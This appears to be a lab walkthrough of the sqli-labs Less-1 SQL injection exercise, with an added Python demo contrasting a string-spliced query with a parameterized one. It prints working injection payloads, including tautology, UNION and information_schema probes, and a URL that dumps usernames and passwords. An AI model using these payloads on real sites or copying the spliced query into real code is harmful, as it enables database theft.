Sqli-labs Less-1
Start by appending a ' to http://127.0.0.1/sqllib/Less-5/?id=1 and look at the effect:
From the error we can see that, after submitting 1', the statement the application builds ends in '1'' LIMIT 0,1: our quote lands right after the one the code already adds. That is how we read the information we need out of the error message; the next question is how to get rid of the superfluous quote.
Try ' or 1=1--+
The constructed SQL statement now becomes
Select ****** where id='1' or 1=1--+' LIMIT 0,1
and the page returns its normal data: everything after --+ (the trailing quote and the LIMIT clause) is treated as a comment.
ORDER BY can be used here to find the column count: ORDER BY n sorts the result by column position, and since this query returns three columns only ORDER BY 1 to 3 succeed; anything greater than 3 is an error.
The result of ' order by 4--+ therefore shows that the column count has been exceeded.
Finally, let us look at the source code to see why the injection happens.
The SQL statement is $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
The id parameter is concatenated straight into the statement with no filtering at all, so when ' or 1=1--+ is submitted the statement actually executed is
SELECT * FROM users WHERE id='1' or 1=1--+' LIMIT 0,1
which is always true because of or 1=1.
In addition, UNION-based injection is covered here. UNION joins the results of two SQL statements; the example below shows how, and the key requirement is that the SELECTs on either side of the UNION return the same number of columns. The difference between UNION ALL and UNION is that UNION additionally removes duplicate rows. With this background in place, we apply what we know about information_schema.
Http://127.0.0.1/sqllib/Less-1/?id=-1 ' Union Select 1,2--+
When the id does not exist in the database (which is why we use id=-1), the two statements are combined by the UNION: the first SELECT returns nothing, so what is displayed is the result of the second. Here the front-end page returns the data from the UNION we constructed.
Dumping the database names
Http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata--+
The SQL statement at this time is select * from users where id='-1' union select 1,group_concat(schema_name),3 from information_schema.schemata--+' LIMIT 0,1
Dumping the tables of the security database
Http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+
The SQL statement at this time is select * from users where id='-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+' LIMIT 0,1
Dumping the columns of the users table
Http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+
The SQL statement at this time is select * from users where id='-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+' LIMIT 0,1
Dumping the data
http://127.0.0.1/sqllib/Less-1/?id=-1%27union%20select%201,username,password%20from%20users%20where%20id=2--+
The SQL statement at this time is select * from users where id='-1' union select 1,username,password from users where id=2--+' LIMIT 0,1
Less-1 through Less-4 can all be injected with the UNION technique above, so it is not repeated for those levels.
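As an added example (not code from the lab or from the original post) tying the source analysis above to the UNION payload just shown: the statement is rebuilt in Python against an in-memory SQLite table with three constructed rows, once by string splicing exactly like the lab's $sql and once with a bound parameter. Assumptions: SQLite stands in for MySQL, and the payloads are URL-decoded, so --+ becomes "-- ", which ends the line as a comment in both engines.

```python
import sqlite3

# Constructed sample data standing in for the lab's users table
# (three columns, as the ORDER BY probe on the page shows).
SAMPLE_ROWS = [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?,?,?)", SAMPLE_ROWS)
    return conn


def build_vulnerable_sql(user_id: str) -> str:
    """Same shape as the lab's $sql: the id is spliced in with no escaping."""
    return f"SELECT * FROM users WHERE id='{user_id}' LIMIT 0,1"


def query_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    return conn.execute(build_vulnerable_sql(user_id)).fetchall()


def query_parameterized(conn: sqlite3.Connection, user_id: str) -> list:
    # The placeholder binds user_id as a value: it can never close the quote
    # or append UNION or comment syntax to the statement text.
    return conn.execute("SELECT * FROM users WHERE id=? LIMIT 0,1", (user_id,)).fetchall()


# Payloads from the page, URL-decoded ("--+" becomes "-- ").
TAUTOLOGY = "1' or 1=1-- "
UNION_DUMP = "-1' union select 1,username,password from users where id=2-- "


def demo() -> dict:
    """Run both payloads through the spliced and the parameterized query."""
    conn = make_db()
    return {
        "vuln_tautology": query_vulnerable(conn, TAUTOLOGY),   # every row, LIMIT gone
        "vuln_union": query_vulnerable(conn, UNION_DUMP),      # attacker-chosen row
        "safe_tautology": query_parameterized(conn, TAUTOLOGY),  # no match
        "safe_union": query_parameterized(conn, UNION_DUMP),     # no match
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(name, rows)
```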